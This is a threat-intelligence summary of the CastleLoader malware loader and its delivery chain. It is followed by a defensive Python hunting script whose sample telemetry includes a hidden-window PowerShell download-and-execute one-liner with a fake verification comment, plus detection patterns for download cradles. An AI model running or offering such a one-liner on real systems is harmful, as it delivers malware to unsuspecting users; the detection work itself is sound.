CastleLoader Analysis
Essential information
- Published: 13/08/2025 11:57
- Modified: 13/08/2025 15:47
- Tags: 2025-08-13, autoit, c2, castleloader, deerstealer, github, hijackloader, information stealers, malware loader, netsupport rat, payload delivery, phishing, powershell, rats, redline, sectoprat, stealc, u.s. government
- Related entities: 18 techniques (MITRE), 7 malware, 2 others
Description
CastleLoader is a modular malware loader that has infected 469 devices since May 2025, a reported infection rate of 28.7%. Initial access comes from Cloudflare-themed ClickFix lures (fake verification pages that instruct the victim to paste a command into the Windows Run dialog) and from fake GitHub repositories. Its stagers use PowerShell and AutoIt scripts to load shellcode into memory and connect to C2 servers.

Its modular design lets operators deploy several second-stage payloads, including the StealC and RedLine information stealers, NetSupport RAT, DeerStealer, HijackLoader, and SectopRAT. Observed campaigns target U.S. government entities and retrieve payloads from legitimate file-sharing services and compromised websites, which makes the infrastructure harder to take down.
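The chain described above (a ClickFix paste that spawns hidden PowerShell with a download-and-execute one-liner, then an AutoIt interpreter running from a user-writable path) is a good hunt target in process-creation telemetry. The script below is an added example, not part of this report or of any CastleLoader analysis: the field names follow a Sysmon Event ID 1-style record, the sample events and hostnames are constructed, and the patterns are generic ClickFix and AutoIt tradecraft rather than CastleLoader-specific indicators.

```python
"""Hunt heuristics for a ClickFix -> hidden PowerShell -> AutoIt loader chain.

Added example. Field names, sample events and hostnames are constructed;
the regexes encode generic tradecraft, not indicators from the report.
"""
import re
from dataclasses import dataclass
from typing import List


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1-style, field names assumed)."""
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Generic ClickFix tradecraft: the lure has the victim paste a one-liner into
# the Run dialog (parent explorer.exe), the console is hidden, a second stage
# is downloaded and piped into Invoke-Expression, and a trailing comment makes
# the pasted text look like a human-verification step.
HIDDEN_WINDOW = re.compile(r"-(?:w|win|windowstyle)\s+hidden\b", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|"
    r"downloadfile|start-bitstransfer|curl|wget)\b", re.I)
EXEC_SINK = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
LURE_COMMENT = re.compile(r"#.*\b(?:verify|human|robot|captcha|ray id)\b", re.I)

# AutoIt interpreter launched from a user-writable directory: the loader stage
# that the report says is used to load shellcode in memory.
AUTOIT_IMAGE = re.compile(r"autoit3(?:_x64)?\.exe$", re.I)
USER_WRITABLE = re.compile(
    r"\\(?:users\\[^\\]+\\appdata|users\\public|programdata|windows\\temp)\\", re.I)


def score_event(ev: ProcEvent) -> List[str]:
    """Return the names of the heuristics the event matches, in a fixed order."""
    hits: List[str] = []
    child = _basename(ev.image)
    if child in ("powershell.exe", "pwsh.exe"):
        if _basename(ev.parent_image) == "explorer.exe":
            hits.append("ps_from_explorer")        # typical of a Run-dialog paste
        if HIDDEN_WINDOW.search(ev.command_line):
            hits.append("hidden_window")
        if DOWNLOAD_CRADLE.search(ev.command_line) and EXEC_SINK.search(ev.command_line):
            hits.append("download_and_execute")
        if LURE_COMMENT.search(ev.command_line):
            hits.append("clickfix_lure_comment")
    if AUTOIT_IMAGE.search(ev.image) and USER_WRITABLE.search(ev.image):
        hits.append("autoit_from_user_path")
    return hits


def is_suspicious(ev: ProcEvent) -> bool:
    """One weak PowerShell signal alone is noise; require two, or the AutoIt signal."""
    hits = score_event(ev)
    return "autoit_from_user_path" in hits or len(hits) >= 2


def triage(events: List[ProcEvent]) -> List[int]:
    """Indices of the events worth an analyst's time."""
    return [i for i, ev in enumerate(events) if is_suspicious(ev)]


# Constructed sample telemetry; URLs and paths are placeholders, not real IOCs.
SAMPLE_EVENTS = [
    ProcEvent(  # ClickFix paste: explorer -> hidden PowerShell -> iwr | iex + lure comment
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell -w hidden -c \"iex (iwr 'https://files.example.invalid/verify.txt')\" "
        "# Verify you are human - Ray ID: 8f3a1b2c",
    ),
    ProcEvent(  # AutoIt interpreter dropped under %AppData% running a compiled script
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"C:\Users\alice\AppData\Roaming\Verify\AutoIt3.exe",
        r"AutoIt3.exe C:\Users\alice\AppData\Roaming\Verify\update.a3x",
    ),
    ProcEvent(  # Benign scheduled script: no cradle, no hidden window, not from explorer
        r"C:\Windows\System32\cmd.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"powershell -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    ),
    ProcEvent(  # User opened an interactive PowerShell from the Start menu: one weak signal
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell",
    ),
    ProcEvent(  # AutoIt installed under Program Files: legitimate developer use
        r"C:\Windows\explorer.exe",
        r"C:\Program Files (x86)\AutoIt3\AutoIt3.exe",
        r"AutoIt3.exe C:\tools\build.au3",
    ),
]

if __name__ == "__main__":
    for i in triage(SAMPLE_EVENTS):
        print(i, score_event(SAMPLE_EVENTS[i]))
```

The two-signal rule for PowerShell keeps ordinary interactive shells out of the queue, while any AutoIt interpreter running from AppData, ProgramData, Public or Temp is flagged on its own, since the interpreter is normally installed under Program Files. Tune `USER_WRITABLE` and the cradle list to the environment before deploying; the page gives no CastleLoader-specific command lines to key on.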